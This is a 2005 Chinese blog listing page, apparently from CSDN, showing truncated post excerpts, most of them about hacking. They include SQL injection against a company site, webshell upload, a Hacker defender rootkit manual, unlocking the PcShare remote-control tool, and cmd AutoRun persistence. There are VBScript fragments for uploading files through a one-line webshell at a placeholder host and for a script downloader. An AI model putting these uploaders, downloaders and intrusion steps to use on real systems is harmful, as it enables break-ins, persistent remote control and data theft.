- 博客(12)
- 收藏
- 关注
原创 BLOG暂停更新一个月!
毕业了,几多失落,几多欢喜。 无语。曾经的红盟,黑盟,鹰盟,已经典不再。孩童般的游戏不能继续下去,ToolHacker遍地是,忽想曾火遍大江南北的一句台词:”一点技术含量也没有“ 。的确,就知道拿些别人写的EXP编译后炫耀,有没有想过自己什么时候出几个EXP?? 畸形的教育,金钱的诱惑,麻木的社会,落后的思想,盲目的追求使我失去了许多许多. 强技术方能强国,重思想方能救国。|社会如
2005-05-22 08:51:00 1490
原创 CISCO路由器的配置与调试
路由器在计算机网络中有着举足轻重的地位,是计算机网络的桥梁。通过它不仅可以连通不同的网络,还能选择数据传送的路径,并能阻隔非法的访问。 路由器的配置对初学者来说,并不是件十分容易的事。现将路由器的一般配置和简单调试介绍给大家,供朋友们在配置路由器时参考,本文以Cisco2501为例。 Cisco2501有一个以太网口(AUI)、一个Console口(RJ45)、一个AUX口(RJ45)和两个同步串
2005-05-12 08:03:00 1603
原创 搜索型注入成功搞定跨国电子公司
文/图 勇哥儿大家都知道,注入方式主要有数字型和字符型,但新手们常常忽略搜索型,因为搜索型在判断是否存在漏洞时要在搜索文本框中输入内容,然后再根据返回的页面内容来判断,比较烦琐。虽然NBSI2带有这种注入方式,但在打开页面的时候参数中一般是不带有搜索的参数的,怎么办呢?我的办法是手工改造它,然后再用NBSI2帮忙。先给大家讲点前置知识,假如你只打算取出name记录,而且这些记录的名字必须以字母w
2005-05-12 07:45:00 1378
原创 突破SQL错误提示上传webshell
作者:疯狗 http://www.cnbct.org/得到SQL注入点,首先想到的是BACKUP WEBSHELL,扔在NB里跑一圈,发现屏蔽了SQL错误信息,得不到物理路径,那还写个PP马了.联想到一个权限不是很高的命令openrowset,进行跨库服务器查询,就是把一个SQL命令发送到远程数据库,然后看返回的结果,但是要启动事件跟踪!我们可以把网站信息写入数据库,然后%$^%$@#$@^%
2005-05-12 07:44:00 1327
原创 一句话木马用upfile.vbs
with wscriptif .arguments.countffn=replace(.arguments(1),"/","%5C"):ffn=replace(ffn,":","%3A"):ffn=replace(ffn,"~","%7E")url= "http://www.xxxx.com/a.asp?a=with+server.createobject%28%22adodb.stream%22
2005-05-12 07:39:00 2251
原创 让PcShare2005vip免费
http://www.ebugd.com/Noah/images/pic/pcshare01.jpgscreen.width-300)this.width=screen.width-300" border="0" alt=""/>http://www.ebugd.com/Noah/images/pic/pcshare02.jpgscreen.width-300)this.width=screen.
2005-05-12 07:38:00 1354
原创 Hacker defender 中文使用说明
文章译者:ZiQi [E.S.T]信息来源:邪恶八进制安全小组(www.eviloctal.com)才疏学浅,不便之处,还请多多包涵。=============[Hacker defender -中文使用说明]================NT Rootkit----------作者: Holy_Father Ratter/29A 版本: 1.0.0开发日期: 01.01.2004网站: htt
2005-05-12 07:36:00 2493
原创 记一次艰苦的入侵
作者:勇哥儿 来源于:潮阳人网站 发布时间:2005-4-8 10:54:11本文已在黑客防线05年第3期发表04年不平凡的一年,各种漏洞相继发现,各种入侵技巧也应运而生,原本固若金汤的机器,在新的漏洞面前,也变的弱不禁风。牛人发现并编写的Serv-u的溢出程序,为提升系统权限大开方便之门,NBSI把SQL注入发挥的淋漓尽致,PHP注入也日趋成熟,哪位怪才发现的上传漏洞在很多脚本中也都花样倍出
2005-05-12 07:35:00 1665 1
原创 批处理内部命令!
1、Echo 命令打开回显或关闭请求回显功能,或显示消息。如果没有任何参数,echo 命令将显示当前回显设置。语法echo [{on|off}] [message]Sample:@echo off / echo hello world在实际应用中我们会把这条命令和重定向符号(也称为管道符号,一般用> >> ^)结合来实现输入一些命令到特定格式的文件中.这将在以后的例子中体现出来。 2.@ 命令表示
2005-05-04 13:37:00 1703
原创 一个有趣的小窍门
无聊,cmd /?后看见好多东西,其中有个好玩的: ******************* 如果 /D 未在命令行上被指定,当 CMD.EXE 开始时,它会寻找 以下 REG_SZ/REG_EXPAND_SZ 注册表变量。如果其中一个或 两个都存在,这两个变量会先被执行。 HKEY_LOCAL_MACHINE/Software/Microsoft/Command Processor/AutoRun
2005-05-04 13:36:00 1394
原创 How does netstat work
netstat是用来查出网络连接相关信息的命令,他是一种分析型的命令,所有的数据都存放在proc下面。netstat去proc下读取信息然后将信息输出。如果不了解什么是proc,请参考 理解 Proc 文件系统拿netstat -nlp这个命令做例子,n是使用数字来显示,l是监听,p是显示程序的PID和名称,以及程序的所有者 当执行netstat -nlp时,该命令首先在proc下遍历所有的PID
2005-05-04 13:35:00 1543
原创 用脚本实现下载
在网上收集的1. dl.vbeecho with wscript:if .arguments.count^dl.vbeecho set aso=.createobject("adodb.stream"):set web=createobject("microsoft.xmlhttp") >>dl.vbeecho web.open "get",.arguments(0),0:web.send:if
2005-05-03 09:07:00 1427 1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人